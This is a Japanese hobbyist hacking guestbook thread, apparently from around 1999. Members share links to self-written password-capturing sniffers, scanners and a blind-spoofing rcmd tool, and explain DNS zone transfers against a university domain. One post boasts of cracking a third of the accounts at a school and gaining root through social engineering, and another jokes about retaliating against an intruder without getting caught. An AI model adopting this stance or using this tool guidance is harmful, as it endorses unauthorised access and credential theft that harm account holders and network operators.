| 【メッセージ】 んー とりあえずSunOS4.1.xに対応してくれればよいっす(笑) 最近こっち系やってないなぁ・・・ あ、例の件はもーーーーうちょっと待ってくださいね |
| 【名 前】UNYUN 【タイトル】取りこぼし 04/07 05:31 |
unewn4th@usa.net |
| 【メッセージ】 あ〜、取りこぼしてますか〜 すんません、改良お願いしますです... >anonymousのフィルタリング、同一IDのフィルタリングとか。 機能的な追加はイロイロあったほうがいいっすね。 popとか、winやmacがバシバシあるとこは泣き入るでしょうね(笑) あと、キャプチャサイズとか、パス+ID+アドレスのみの抽出とかの 普通っぽいのも。 それと、一応UDPモノも。 コンパイル時のオプションでSolaris、SunOSにも対応させよう かと。 しかし、IRIXがどうもうまくPROMISCUSに出来ないっす。 ちゅうか、PANIC!!出てOS落ちるんで、デバッグがしんどいぃ! なんでやー! |
| 【名 前】hsj 【タイトル】re:(2)んー 04/05 22:01 |
hsj@geocities.co.jp |
| 【メッセージ】 接続テーブルの中のシーケンス番号が更新されないからじゃ ないでしょうか?>取りこぼし #接続テーブルに送ったデータの長さを追加するとか・・・ しかし、この接続テーブル作成の考え方は大いに参考になります〜 |
| 【名 前】焙煎麦茶 【タイトル】re:(1)んー 04/05 12:26 |
|
| 【メッセージ】 かなりの確立でとりこぼしあるっぽいですね。 >snif これベースにして改良してみます。 ありえる機能としては、 anonymousのフィルタリング、同一IDのフィルタリングとか。 昔ふつーのsnif仕掛けて、10分置きにデータ更新するユーザーがいて えらいめに会いましたから(笑) |
| 【名 前】焙煎麦茶 【タイトル】んー 04/05 11:38 |
|
| 【メッセージ】 全データsnifferですけど 取れない(笑) サーバからの返事だけがロギングされてます。 なんか設定にミスあるのかな。 もうちょっと実験してみますわ。 |
| 【名 前】UNYUN 【タイトル】re:(4)うにゅんさん 04/03 20:24 |
unewn4th@usa.net |
| 【メッセージ】 一応、全データロギングするsniffer作ってみました。 でも、あんましテストしてないんで、他でちゃんと 動くかちょっと心配です。 全データロギングするんで、踏み台なサーバに入れたり すると先までずーっとロギングするんで、IPやパス、 rootshellなんかの在処やrootとりの手順も、当然分かる んで、管理者の人も証拠をGETするのに都合がいいでしょう(笑) http://www.fortunecity.com/skyscraper/byte/551/tools/greedydog.c |
| 【名 前】UNYUN 【タイトル】re:(3)うにゅんさん 04/02 19:36 |
unewn4th@usa.net |
| 【メッセージ】 >全コネクションのデータとってたら >プロセスでいっぱいになっちゃって(笑) うーん、たしかにプロセスでやってたらきついっすね。 メモリをばんばん食うタイプとかも作ってみたんですけど、 コイツも良く考えるとダメですなぁ。 で、各コネクション毎に一時ログファイルを作り、それぞれに パケットをAppendして、コネクションが切れたら本ログファイル に追加する方法でやろうかと。 しかし、なんかヘンな所で結構苦労するなぁ... ついでに、パケット講座・第2段で、Snifferの原理解説 お手軽SimpleSnifferも近々アップするので、興味の あるヒトは、また来てくださいねー。 あと、某氏(笑)がナイスなOS判別に関する実験結果を提供して くれたんで、私のも追加して整理して公開しますんで、ちょっと 待っててくださいな。 |
| 【名 前】puffy 【タイトル】東京大学がもし簡単に簡単に陥落するんなら? 04/01 23:55 |
puffy@bastard.com |
| 【メッセージ】 恐ろしいことになっちゃう(笑) あそこにsnifferなんて仕掛けられたらたまらんでしょ? ISPは? |
| 【名 前】うにゅん 【タイトル】re:(3)うにゅんさん 04/01 22:38 |
unewn4th@usa.net |
| 【メッセージ】 >全コネクションのデータとってたら >プロセスでいっぱいになっちゃって(笑) ありゃー、そういうことだったんですかー(笑) もうすぐガッコ行くんで、私もやってみよっと。 >それ以上に仕事がすすまねーーーー >ったく・・・ 私もガッコのヤツは全く進まないっすよ。 ここ数ヶ月、全くコーディングなんてやってない(笑) やっぱね、ネットやUNIXはガッコにあっちゃいけないね。わはははは。 |
| 【名 前】230MB−MO 【タイトル】re:(1)ども、はじめまして。 04/01 21:40 |
|
| 【メッセージ】 >ちなみに東京大学のアカウントもやってみましたがFTP:FTPと言うなさけなさ。 それタダのanonymous ftpアカウントじゃないの?(笑) そうなってくるとその友達ってのもなんかウサンクサイね(笑) |
| 【名 前】午後の紅茶 【タイトル】re:(2)うにゅんさん 04/01 19:27 |
|
| 【メッセージ】 んー、ちゅーかねぇ、 全コネクションのデータとってたら プロセスでいっぱいになっちゃって(笑) どうやっていいものか悩みちゅ。 例えば内部ネットに入れなくても、たまにその手前のサーバで 全データがキャプチャできる場合とかあるじゃないすか そういう時に、データまで全部とれるスニファがあれば便利でしょ。 と、おもったんですね。わはは。 はぁ、全然すすまねーーーー それ以上に仕事がすすまねーーーー ったく・・・ |
| 【名 前】slimepower 【タイトル】ども、はじめまして。 04/01 17:08 |
slimepower@155mm.army.net |
| 【メッセージ】 はじめまして、slimepowerと申します。この度は、YOKO等他のファイルをいただきました。 さっそく学校にやったら1/3(41中14個)のアカウントが取れました(笑) 面白いことにがんばっていたらRootゲットしました(笑)ちなみにやり方は、ソーシャルハッキング(だったけ?)です(笑) ちなみに東京大学のアカウントもやってみましたがFTP:FTPと言うなさけなさ。 でもpasswdをゲットしないとできないので、以降のアップデートに期待します。 ところで、他のファイルを入力した時に100%フリーズしたのはちょっと驚きでした。 明日アメリカに行くのでこれを友達(米産(笑))に紹介させていただきます。 彼はネットワークアドミンと同時に色々なサーバをハッキングしているので評点をもらってきます。 これからもがんばってください。 |
| 【名 前】UNYUN 【タイトル】re(1):おひさしぶりです 04/01 13:42 |
unewn4th@usa.net |
| 【メッセージ】 >Text書かなきゃいけないのに・・・、(クスン) をぉ、生きてましたかー(笑) 最近いないと思ったら、そういうことだったのね。 テキストはぼちぼちでいいですので、真剣に悩まないでください(笑) |
| 【名 前】UNYUN 【タイトル】re:(1)うにゅんさん 04/01 13:26 |
unewn4th@usa.net |
| 【メッセージ】 >Sun用とLinux用のスニッファ作ってください〜 >つうか、1つのコネクションに対しての全データ、 >クライアント、サーバ両方のデータを取れるように >ポート23と21だけでよいですので。 >作ったらなんかゴミでまくるし、わけわからん。 ゴミですか??? うーん、どんなゴミでしょ? 全データ取るのは作ったことない ですけど、ごみが出るってのは... 今晩、ちょっと作ってみます。 |
| 【名 前】Rorrim 【タイトル】おひさしぶりです 04/01 11:19 |
49hack@usa.net |
| 【メッセージ】 どうも、お久しぶりです。 最近、九州行ったり、京都行ったり、引越ししたり、HD−Formatしたりで忙しかったっす。 ちなみに、学校からしかネット出来ない状況が暫く続きそうです。 Text書かなきゃいけないのに・・・、(クスン) |
| 【名 前】biginner 【タイトル】勉強させていただきます 03/31 22:29 |
|
| 【メッセージ】 YOKO他いただきました。ありがとうございます。 |
| 【名 前】wants 【タイトル】教えて君 03/31 21:58 |
|
| 【メッセージ】 NET@DDRESSのSMTP Serverアドレスを教えて下さい。 POPは、わかるのですがSMTPはわかりませんでした。 |
| 【名 前】S 【タイトル】re:(2)すげー 03/31 21:07 |
|
| 【メッセージ】 帰りに買っちゃいまよしたよ〜 この本は何か引かれる物が有るってかんじ。 ぱらっと見て、るーたのDoSも有ったしね。 でも高い〜〜〜。 せっかく飲み会をキャンセルして貯めたお金なのに。。。。 あ。久しぶりのか書き込みでした。 私信 2年間お疲れさま(笑) >reverse様 |
| 【名 前】ミニッツ・メイト 【タイトル】うにゅんさん 03/31 18:26 |
|
| 【メッセージ】 Sun用とLinux用のスニッファ作ってください〜 つうか、1つのコネクションに対しての全データ、 クライアント、サーバ両方のデータを取れるように ポート23と21だけでよいですので。 ちゅーか、そこらのスニッファ、わけわからん。 作ったらなんかゴミでまくるし、わけわからん。コノヤロウ!! |
| 【名 前】UNYUN 【タイトル】を 03/30 23:53 |
unewn4th@usa.net |
| 【メッセージ】 おぉ、板前さんに、かえるさんだー いらしゃいまし〜 かえるさん、メル届いてないですけど... あ、もしやthe-pentagon.comでしょうか? あそこ、最近調子が悪いらしく、今は見に行けないです。 ちょくちょく見にいってみます。 お急ぎの場合は、すんませんがICQかusa.netにお願いします。 |
| 【名 前】かえるです 【タイトル】うにゅ〜んさんへ” 03/30 22:25 |
kaeru@artlover.comhttp://backr.server.ne.jp/ |
| 【メッセージ】 えっとーメール送ったんですけど とどいてますか? 板前氏に聞いていただければ 本物だとわかっていただけると思います で ほんとにお願いしたいので 連絡をよろしくお願いします |
| 【名 前】板前 【タイトル】re:(3)すげー 03/30 22:15 |
itamae@iname.com |
| 【メッセージ】 「クラッキング対策ファイナルガイド」なんとなく 目に付いたので買っちゃいました。少し読んでみま したけど面白いですね。 |
| 【名 前】reverse 【タイトル】re:(1)すげー 03/29 22:54 |
esrever@usa.nethttp://members.tripod.com/~reverse/ |
| 【メッセージ】 私も買いました。実は半月ぐらい前から気にはなってました。 まだちゃんと読んでないですが、凄いです。 ハック本もここまで来たか!とショックを受けました。 原題の「A Hacker's Guid to Protecting Your Internet Site and Network」 が内容を良くあらわしてます。 そのうちちゃんとしたブックレビュー書きます。\6800- |
| 【名 前】UNYUN 【タイトル】re:(1)すげー 03/29 21:52 |
unewn4th@usa.net |
| 【メッセージ】 >翔泳社から出てる「クラッキング対策ファイナルガイド」これすげー。 え、もう出てるんですか? これ、管理者本を装ってるけど、クラッキングマニュアルっぽい ですよね(笑) なんか、アメリカちっくでいいなぁ。 |
| 【名 前】ミルクレープ 【タイトル】すげー 03/29 19:21 |
|
| 【メッセージ】 翔泳社から出てる「クラッキング対策ファイナルガイド」これすげー。 かなーりネタばらし。 説明省いてる部分が結構あるけど、これやばすぎ(笑) あ、うにゅんさんメル見ました。了解っす。 |
| 【名 前】UNYUN 【タイトル】re:(2)やったぜ 03/29 16:08 |
|
| 【メッセージ】 >もしかして、私の厄がUNYUNさんのほうに乗り移ったからだったりして・・・ あ、きっとそうです(笑) 今度は私の分も拝んどいてくださいよぉ〜 >今のところ基盤は一般的なUNIXで、Solaris7のことはメモ程度にはさんで >いこうかと思ってますが、これでもOKですか? オッケーです。 よろしくお願いしますね〜。 |
| 【名 前】UNYUN 【タイトル】UNYUN@家 03/29 16:05 |
|
| 【メッセージ】 いまさっき帰ってきました。 カゴメさん、reverseさん、メル着弾確認願います。 いやぁ、しかし新幹線は疲れるなぁ... |
| 【名 前】wannab 【タイトル】re:(2)Intruder 03/27 19:28 |
j_-p@usa.net |
| 【メッセージ】 > こんなとき、皆さんならどうされます? certに報告するのはどうでしょうか? 書式が決まってるので下を参考にしてください。 http://www.jpcert.or.jp/form-sjis.txt 踏み台にされたのなら、そこから攻撃されたサーバーの管理者がcertにあなたのところをブラックリストとして報告しているかもしれません。 印象をよくするためにもしたほうがいいかも(^^) σ(^^)は一度だけ相手のサーバー管理者に注意のメールを投げたことがありますが メールが戻ってきた(笑) 踏み台にされてるISPやサーバーの管理者にはメールでは結構連絡取れなかったりする(笑) > やっぱり...報復ですか?(爆) バレないようにやりましょう(ぉぃ |
| 【名 前】Hariru 【タイトル】re:(1)Intruder 03/27 01:52 |
hariru@eastmail.com |
| 【メッセージ】 >春から学校の1フロアのネットワーク管理押しつけられてしまいました(;_;) >IRIX,Linux,Win,Macが混在 >嗚呼めんどくさい... 嗚呼!管理ができるだけでも、よい環境っすよ。 私のいた大学なんてLinuxどころか、 ネットワークすらつながっていなかったに〜 結局最後の一年だけいんたーねっとができただけ。 しかもそれはHDいっぱいで、ハングしまくるおそおそWin95マシンのみ。 う〜、私だったらネットワークの管理ができるってだけで、 嬉々として飛びついていたのになあ。まあ、そんなスキルもないけどね。 そんなわけでこんな不幸なやつもいるんで、 面倒くさがらずがんばってくださいね。 >こんなとき、皆さんならどうされます? >やっぱり...報復ですか?(爆) はやりこれを機に、管理者から管理の権限を広げてもらいましょう(笑) |
| 【名 前】Hariru 【タイトル】re:(1)やったぜ 03/27 01:48 |
hariru@eastmail.com |
| 【メッセージ】 >Myアカウントのファイル、ほぼ消滅。 >作りかけのUGツールや実験もの、ブックマークにメール >ついでに表のHP(笑) >ぜ〜んぶ消えてしもた。 もしかして、私の厄がUNYUNさんのほうに乗り移ったからだったりして・・・ そうだったら、ごめんなさいです〜 この間、とある神宮に行って賽銭箱に1円入れたのがまずかったのかなあ。 しかも拝まずさっさと帰ったし・・・ 今度行ったときは奮発して10倍入れときますね(笑) 「UNIX基礎講座」ですが、やはりSolaris7がベースですか? なんだか、手持ちのテキストといろいろ食い違いがあって、 説明が思ったよりややこしいです。 今のところ基盤は一般的なUNIXで、Solaris7のことはメモ程度にはさんで いこうかと思ってますが、これでもOKですか? |
| 【名 前】eperm 【タイトル】Intruder 03/26 07:39 |
|
| 【メッセージ】 こんにちわ。 春から学校の1フロアのネットワーク管理押しつけられてしまいました(;_;) IRIX,Linux,Win,Macが混在 嗚呼めんどくさい... 1月程前に発覚したんですが、アイスランドからクラック 受けてて、見事に踏台にされてました。あはは 管理者様多忙のため管理されてないんです。 結局、tcpwrapperでアクセス制限をかける程度の消極的な 対処しか許されなかったんですが... sniffer仕掛けてログをばっちりとってあったんで、ちょっと もったいないかなあ 相手はアイスランドのISPから入って来たのは間違いないので、 そこを叩けば個人の特定までいけるとおもうんですが、 やったからってどうなるもんでもないですな。 #mailありがとうございました。> UNYUNさん こんなとき、皆さんならどうされます? やっぱり...報復ですか?(爆) |
| 【名 前】blue3 【タイトル】ええと 03/26 05:54 |
|
| 【メッセージ】 >侵入するとコンソールに何か吐き出すんですか? /etc/syslog.conf の設定にもよりますが、 多くの Linux ディストリビューション・FreeBSD では吐き出されると思います。 >dnsゾーンの転送ってどうやってやるんですか? nslookup ツールの querytype を AXFR にしてください。 (win の cyberkit もできるはず) 又、ターゲットの設定でゾーン転送を特定のホスト以外を拒否することも できますので、全てのホストでできるとも限りません。 下のサイトのような方法でも見れます。 http://www.geocities.co.jp/SiliconValley/9676/ns.html 内の slackware では、dig @nic.ad.jp. ac.jp. axfr で確認してます。 やるんじゃお早めにー。 # nslookup, set type=AXFR, server nic.ad.jp, ac.jp. # でやってみたけど、できなかった・・・。なんでかわかります? |
| 【名 前】haruki 【タイトル】dnsゾーンの転送 03/26 02:37 |
|
| 【メッセージ】 すみません、もう一つ。 dnsゾーンの転送ってどうやってやるんですか? あつかましくてすみません。 |
| 【名 前】haruki 【タイトル】コンソール 03/26 02:32 |
|
| 【メッセージ】 すみません。ちょっとおしえてほしんですけど wormさんの所の足跡の消し方で 「コンソールに吐かれた侵入した証拠」 ってゆうのがあるんですけど、侵入するとコンソールに何か吐き出すんですか? |
| 【名 前】BEAMZ 【タイトル】>やったぜ 03/24 13:38 |
http://sourceofkaos.com/homes/haru/ |
| 【メッセージ】 うはー(;´Д`) 私も最近やったばかりなのでお気持ち分ります。 お気を落とさずに頑張って下さい。 というかこういう時ってBackUpを取っていなかった事を 心から後悔してしまいますよね・・。 |
| 【名 前】UNYUN 【タイトル】やったぜ 03/23 19:51 |
unewn4th@usa.net |
| 【メッセージ】 わーい。 自鯖のO2、やってしもーた。 Myアカウントのファイル、ほぼ消滅。 作りかけのUGツールや実験もの、ブックマークにメール ついでに表のHP(笑) ぜ〜んぶ消えてしもた。 研究のだけはバックアップで復活したので、怒られることは ないけど... いっそ、6.5に上げよう。 |
| 【名 前】Hariru 【タイトル】解決 03/22 17:11 |
hariru@eastmail.com |
| 【メッセージ】 まさかあるとは思わなかったけど、 http://access1.sun.com/drivers/index.htmlに Solaris 7 (Intel Platform Edition) Device Configuration Assistant Boot Disketteを 発見し、何とかインストールすることができました。 さすが世界で最も普及しているといわれている、UNIX系のOSというところでしょうか。 それからshのMANPATHは export MANPATH;export MANPATH=$MANPATH:/usr/local/man で、設定できました。 ありがとうございます。>blue3さん しかし、なぜexportが2回も必要なのかなぞですね〜。 しかもこれを2行に分けて実行しても、なぜか効果ないし。 セミコロンって、コマンドの連続実行してくれるだけじゃないのかなあ。 ま、設定できたから良しとするか。 |
| 【名 前】k00L 【タイトル】あう 03/20 10:50 |
|
| 【メッセージ】 メル着弾願います→メル着弾の確認願います ・・うぅ・・すいません |
| 【名 前】k00L 【タイトル】連絡 03/20 10:49 |
webmaster@backsection.comhttp://backsection.com |
| 【メッセージ】 @UNYUNさん メル着弾願います。 大事なお知らせっす〜(笑) UDPスキャナ・・あそこに上げておきました(謎) UNYUNさんが入れないところでなくて前からあるあそこです(笑) |
| 【名 前】Keynes 【タイトル】Satan 03/20 03:02 |
|
| 【メッセージ】 はじめまして。 FreeBsdにサタンをインストールしたんですが、 コンソールからmyname.my.domain:10xxをクリック しても全然反応しません。串はもちろんはずしてます。 ppp接続だと何か特別な設定とか必要なのでしょうか? サーチしても関係するサイトが全然見当たらないもので。 どなたかやってみたことある方います? |
| 【名 前】blue3 【タイトル】re:(1) やってしまった 03/19 05:51 |
blue3@usa.net |
| 【メッセージ】 sh なら export 変数名; か export 変数名=価; csh なら setenv されました? |
| 【名 前】Hariru 【タイトル】うわ〜 03/19 02:52 |
hariru@eastmail.com |
| 【メッセージ】 うわ〜。今度はインストールに必要な、 Solaris Device Configuration Assistantフロッピーが動かなくなった〜 インストールもできない〜 こ、こうなったら・・・ 寝よ。今日は厄日みたい。 んっ。ってことはあと21時間あるってこと? ふ、深く考えまい・・・ |
| 【名 前】Hariru 【タイトル】やってしまった 03/19 02:02 |
hariru@eastmail.com |
| 【メッセージ】 う〜ん。やってしまった(笑) PATHの件、とりあえずcshの方はうまくいったんですが、 結局shのMANPATHの指定の仕方がわからなかった。 仕方がないからcshに変えようとAdmintoolを動かしたけど、 rootのシェルが変えられない。 (このときなにやら出ていた気もするが、読んでいないっす) chshも使えないみたいだし、どうしようかと悩んだ末、 /etc/passwdに書かれたシェルを変えるとよいのかな、 と安易な気持ちで保護モードを変えてまで書き換えてしまったのが運の尽き。 再度ログインすると、No shellといわれてログインできないではないか! 元に戻そうにも/etc/passwdの保護モードは-rw-r--r--だし、 rootになれなくなってしまった。 私には、これを元通りにする手は一つだけです。 再いんすとーる・・・うぅ・・・ |
| 【名 前】UNYUN 【タイトル】re:(1)re 03/18 19:38 |
unewn4th@usa.net |
| 【メッセージ】 >んで、いちいち時間かけてやってらんないので、 >クラスB用として65536バイトのメモリ空間とって >結果を保存とか考えたんだけど、 >どういう風にすれば最も正確な値がでますかねぇ・・・ >(あと保存 わぉ、一気にCLASS Bっすか。 ウチの大学はOS名込みの全hostsがanonymous ftpで手には いるので(爆)、ある程度自動でデータベース作成できますね... これは結構効率的かも。あぁ、でもコワイ...(笑) |
| 【名 前】UNYUN 【タイトル】re:(1)re 03/18 19:26 |
unewn4th@usa.net |
| 【メッセージ】 >WindowSizeがネットワークバイトオーダーなのは何故・・ >非常に追加しにくいです(笑) わははは。 とうとう突っ込まれた(笑) 最初、気付かないで、「ふむふむ、こういう値か...」とかいって 追加してて、途中で気付いたんですけどねー。 直すのがめんどかったんで、そのままにしました(笑) |
| 【名 前】UNYUN 【タイトル】re:(1)時間はあるんですが・・・ 03/18 19:22 |
unewn4th@usa.net |
| 【メッセージ】 >PATHやMANPATHの設定ができず、フルパスでないと実行できません。 >setでできると思っていたのですがどうもうまくいかないです。 cshはset path、shはPATHで設定できます。 ディフォルトはcshなら、.cshrc、shなら.profileにあります。 >どうやら研修中の寮には、Solarisマシンを持っていけそうもないです。 >とりあえず今からUNIX基礎講座に取り掛かろうと思いますが、 >できるのは5月ぐらいになるかも・・・(かなり未定) おぉ、社会人ですか... がんばってくださいねー。 |
| 【名 前】(;´Д`) 【タイトル】re 03/18 19:18 |
|
| 【メッセージ】 >UNYUNさん いいっすよー あとでメルしときます。 ところでシンプルスキャンみましたけど WindowSizeがネットワークバイトオーダーなのは何故・・ 非常に追加しにくいです(笑) んで、いちいち時間かけてやってらんないので、 クラスB用として65536バイトのメモリ空間とって 結果を保存とか考えたんだけど、 どういう風にすれば最も正確な値がでますかねぇ・・・ (あと保存 |
| 【名 前】UNYUN 【タイトル】これじゃぁ... 03/18 19:14 |
unewn4th@usa.net |
| 【メッセージ】 http://www.fortunecity.com/skyscraper/byte/551/tools/udpscan.c 即興で作ってみたけど、これじゃーなぁ... うーん、どうしよう... むずいです。 |
| 【名 前】Hariru 【タイトル】時間はあるんですが・・・ 03/18 19:10 |
hariru@eastmail.com |
| 【メッセージ】 Solaris7はgzip,gcc,perlやら入れて落ち着いてます。 しかし、PPPの設定のほうはダメでした。 くぅ〜、V.90のモデムだったとは・・・ まあWin98で速くなっていいけどね。 UNIXで外つなぐのは、またしばらくお預けです。う〜ん、残念。 Solarisで教えてほしいのですが、 gzipやらのコマンドはデフォルトで入れたのですが、 PATHやMANPATHの設定ができず、フルパスでないと実行できません。 setでできると思っていたのですがどうもうまくいかないです。 それとデフォルトのPATHなどは、どこで指定しているのでしょうか。 そういう記述が見当たらないのですが。 どうかお願いします。 PS. どうやら研修中の寮には、Solarisマシンを持っていけそうもないです。 とりあえず今からUNIX基礎講座に取り掛かろうと思いますが、 できるのは5月ぐらいになるかも・・・(かなり未定) |
| 【名 前】UNYUN 【タイトル】re:(1)スキャナ 03/18 17:56 |
unewn4th@usa.net |
| 【メッセージ】 >理論的にクラスBを10分程度でスキャンできます。 おぉ、かなりマトモなスキャナですねー。 私のは名前もSimpleStealthなので手抜きバリバリ... よろしければ私にも見せてもらえませんか? >WindowSizeの他に、TTLやMSSや、リトライ回数、タイムアウト値、 >なんかでも判別できそうですね、これ。 組み合わせを考えればいい判定パラメータになるでしょうね。 nmapも不完全な所あるし。 >話のついでにUDPスキャナも作ってみたけど >こっちはむずいなー そうなんですよ。 やっぱICMPのエラーを見るしかないんでしょうか... 実験は全然やってないし、UDP、全然掘ってないし... でも、最近流行ってるみたいなんで(笑)、面白そうなモノを 探してみます。 >いちお、いままでの結果とかありますけど >いります?>うにゅんさん 要ります。下さい(爆) 一応、私のトコでもチェックしてみますね。 こういうデータベースをまとめたいなと思ってたんで... >つーか、かえる話って、あれまじ?(笑) かえるさんは良く知らないんで、マジかどうかもイマイチ不明 です(笑) |
| 【名 前】(´ー`) 【タイトル】スキャナ 03/18 15:50 |
|
| 【メッセージ】 作ってみました。 理論的にクラスBを10分程度でスキャンできます。 で、いろんな値をstdoutに出してて思ったんだけど、 WindowSizeの他に、TTLやMSSや、リトライ回数、タイムアウト値、 なんかでも判別できそうですね、これ。 で、いまそれ作ってんだけど、 画面表示が一番のネック(笑) あとnmapとか有名ツールの方が上だろっていう話もあり。 話のついでにUDPスキャナも作ってみたけど こっちはむずいなー いちお、いままでの結果とかありますけど いります?>うにゅんさん つーか、かえる話って、あれまじ?(笑) |
| 【名 前】br@inBug 【タイトル】いけました。 03/18 13:26 |
|
| 【メッセージ】 UNYUNさんどうもありがとうございます。 早速いただきました。 やはりPC98じゃうごかないようですね。<オイオイ 今必死に TCPIPとセキュリティ関連のお勉強をしています。 ここで紹介されている本を参考にさしてもらいました。 予想どおり よだれがでます。<マテ 逆にいい睡眠薬にもなったりしますよね(爆 それでは くだらない質問すいませんでした〜。 |
| 【名 前】UNYUN 【タイトル】re:(1)失礼します。 03/17 16:32 |
unewn4th@usa.net |
| 【メッセージ】 ftp.web.ad.jp/pub/UNUX/WWW/apache/dist/Apache32_1.3b2.exe でどないでしょ。 |
| 【名 前】br@inBug 【タイトル】失礼します。 03/17 16:00 |
|
| 【メッセージ】 こんばんわ。皆さんお初です。 初めてにもかかわらず いきなり質問で大変申し訳ございません。 某雑誌で、Apache32などがあるという事を耳にしました。 しかし 検索にかけてもApacheのホームページに言っても 見当たりません。 UNIXではなくWINでサーバを立てたいのですが もし知っている方がいましたら、場所までとはいいません。 本当にあるのかどうかだけでも お教え願います。 では、くだらない質問ですが答えていただけると 大変光栄です。 |
| 【名 前】UNYUN 【タイトル】えー 03/17 04:03 |
unewn4th@usa.net |
| 【メッセージ】 >reverseさん 27あたりに。コワイ人たちがいたら助けてください(笑) >Hariruさん Solaris7、おっけーですか? 時間ができたら、お願いしまーす。 >cheruさん はじめまして >正規のログイン手順以外でリーモートホストの >資源にアクセスする方法があるのでしょうか? そういうのがウジャウジャあるから、不正アクセス云々が問題 になってる訳で... >skillのないUNIX管理者 どうも、おひさです。 最近忙しくて、HPの更新は怠け気味です(笑) それに、春なので... |
| 【名 前】skillのないUNIX管理者 【タイトル】うにゅんさんへ 03/16 11:56 |
|
| 【メッセージ】 久々に遊びに参りました。 HPの運営、大変だと思いますが、 がんばって下さい!!! では、また遊びにまいります♪ |
| 【名 前】cheru 【タイトル】re:(1)どうも 03/14 01:50 |
|
| 【メッセージ】 野菜生活カゴメさん、BEAMZさん ありがとうございます 早速FreeShell使ってみることにします 自宅でも一応LinuxとBSD立ち上げているのですが ブルートフォースはたしかに一発でばれてしまいますね 正規のログイン手順以外でリーモートホストの 資源にアクセスする方法があるのでしょうか? アノニFTPは今まで試みたところ全て shadowされていましたし・・・・ 本当にどうもありがとうございます レス遅れてしまい申し訳ありませんでした |
| 【名 前】Hariru 【タイトル】Solaris7導入 03/13 23:02 |
hariru@eastmail.com |
| 【メッセージ】 届いたマシンに、Win98とSolaris7の共存させることができました。 というか、右往左往してやっとできました。 とりあえず前のマシンのデータをftpで取ってきたりして、 マシンの再構築していま〜す。 Solaris7は基本システムが入っただけで、 PPPの設定などの設定はできていません。 でも、Window Systemは快適に動いてうれしいですね〜 今までは、テキストベースオンリーでがんばってましたから。 >量子コンピュータと量子暗号の概要 暗号に引かれて読んでみたけど、さっぱり理解できない〜 でも、量子情報論理自体、なんだか興味深いものがありますね。 |
| 【名 前】reverse 【タイトル】教えて君 03/13 19:22 |
esrever@usa.nethttp://hyper2.amuser-net.ne.jp/~auto/b27/usr/reverse/brd1/bbs.cgi |
| 【メッセージ】 密かに話題のblind spoofにrcmdを実装しようとしてます。 bugtraqにポストされたテストプログラムをベースにしてます。 http://members.tripod.com/~reverse/blind.c こいつです。 で、成功しません。 ベースにしたテスト自体は成功(恐いなぁ...)してますし、勿論rloginとかもできてます。 環境は、ターゲットがslackware3.5、カーネル 2.0.34です。 プログラムを実行してるのはTurboLinux3.0です。 脱スクリプトキッズってことで(笑)。何か情報ありましたら、お待ちしています。 |
| 【名 前】BEAMZ 【タイトル】どうも 03/13 13:41 |
http://www.cyberspace.org/nu/newuser.html |
| 【メッセージ】 お久しぶりです。 R0Mってました(笑い FreeShellですが上のやつはどうですか? 結構いいですよ。 希望があれば適当にリスト化しますよ。 んでわ。 |
| 【名 前】k00L 【タイトル】どもですー 03/13 00:34 |
|
| 【メッセージ】 >量子コンピュータと量子暗号の概要がありますよ。 ありがとございましー。 さっそく行って来ます。 >k00Lさん、あの「墓場」には来ないんですかー?(笑) すっかり忘れてまして(^^;;; 今日久々に行ったらなんかこっそり盛りあがってましたね(笑) |
| 【名 前】UNYUN 【タイトル】おぉっ! 03/12 19:15 |
unewn4th@usa.net |
| 【メッセージ】 野菜生活カゴメさん>よろしければここのメンバーに入れてくださいませんか? amiさん>よければボクもメンバーに入れてください うわーぉ! もち、オッケ─っすよ。 しかし、だんだんスゴいことになっていってるような... こりゃ、精進せねば... さっそくPenguinMembersに追加したいんで、時間が空いたら 添付テキストで、自己紹介っぽいのメルしてくださいね〜 ちなみに項目は適当でいいですので、好きなこと書いてくらさい。 |
| 【名 前】ami 【タイトル】メンバー 03/12 18:37 |
|
| 【メッセージ】 よければボクもメンバーに入れてください 教えて君ですけど(笑) |
| 【名 前】野菜生活カゴメ 【タイトル】フリーshellって 03/12 18:35 |
|
| 【メッセージ】 誰でも使えるサーバが世界中にあるんです。 そこでいろいろUNIX覚えたらいかがですか?っていう意味だったわけです。 まずはUNIXの本を読んで基本的な知識を覚えることからはじめましょう。 覚えていくにつれて、リモートからがしがしブルートしたりするのが いかに危険かということがわかってくると思います(笑) でわでわ。 あ、うにゅんさん、 よろしければここのメンバーに入れてくださいませんか? |
| 【名 前】UNYUN 【タイトル】re:(1)量子暗号 03/12 18:33 |
unewn4th@usa.net |
| 【メッセージ】 >UNYUNさんご無沙汰(笑) k00Lさん、あの「墓場」には来ないんですかー?(笑) 量子暗号や量子コンピュータに関する文献は結構あります。 学会でも、その手のネタは多く、応用物理学会、日本物理学会 とかでもやってますので、論文なんかもあります。 論文には参考文献も記載されてますから、大学図書館とかで 取り寄せてみましょう。 サワリ程度でしたら、 http://www.tamagawa.ac.jp/sisetu/gakujutu/pderc/rqcs/kaisetsu.html に量子コンピュータと量子暗号の概要がありますよ。 あと、楕円曲線のネタはよく知らんです。大学が絡んでるから、たぶん、 どっかの数学系とかの学会誌に出てるんでしょうね。 |
| 【名 前】ami 【タイトル】ブラウザでリブートするのだ〜 03/12 18:31 |
|
| 【メッセージ】 あ、ども、実験してたっす "-O2 -DBIG_SECURITY_HOLE" ./configure んな感じで、コンフィグすればできたっす ありがとでした。 |
| 【名 前】UNYUN 【タイトル】re:(1)ども 03/12 18:08 |
unewn4th@usa.net |
| 【メッセージ】 おや、maiさん、いらっしゃーい。 >飲みに行きましょう。 >っていうかそれしか言ってないなぁ(笑)。 楽しみですね〜 |
| 【名 前】UNYUN 【タイトル】re:(1)易斡粟゙ 03/12 17:40 |
unewn4th@usa.net |
| 【メッセージ】 >あと、どなたか、アパッチの最新版をrootでたてる方法ご存じの方いません? http_core.c見ると、Ver1.2.6では-DBIG_SECURTY_HOLEしとく とパスするんですが、Ver1.3.4では-DOS2しないとダメみたいですね。 http_core.cのBIG_SECURTY_HOLEのチェック部を外せばroot でいけました。 って、何かの実験やるんですか〜? |
| 【名 前】k00L 【タイトル】量子暗号 03/12 13:46 |
webmaster@backsection.comhttp://backsection.com |
| 【メッセージ】 UNYUNさんご無沙汰(笑) 以前ちょっとふれてた「量子暗号」に関して言及してる本とかないですか? 光や量子を利用したコンピュータが実現すると暗号解読用鍵の割出しが 一瞬で可能だそうですね。 あと、1997年ヒューレッドパッカード社と埼玉大学、東京工学大学 がスパコンで100年かかると言われていた楕円曲線の解法を3秒でやっちまったそうですね。 どっかに詳しいドキュメントないですかね。 教えて君っす(笑) |
